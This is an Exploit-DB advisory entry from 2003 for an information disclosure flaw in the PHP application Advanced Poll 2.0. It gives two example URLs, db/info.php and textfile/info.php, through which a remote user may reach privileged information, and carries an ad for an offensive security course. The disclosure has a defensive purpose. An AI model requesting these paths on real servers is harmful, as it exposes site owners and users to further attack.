Advanced Poll 2.0 - Remote Information Disclosure

EDB-ID:

22412


Author:

subj

Type:

webapps


Platform:

PHP

Date:

2003-03-22


Become a Certified Penetration Tester

Enroll in Advanced Web Attacks and Exploitation , the course required to become an Offensive Security Web Expert (OSWE)

GET CERTIFIED

source: https://www.securityfocus.com/bid/7171/info

It has been reported that an information disclosure vulnerability exists in Advanced Poll. Because of this, a remote user to potentially access privileged information that could lead to further attack against the host and it's users.

http://www.example.com/[poll_dir]/db/info.php
http://www.example.com/[poll_dir]/textfile/info.php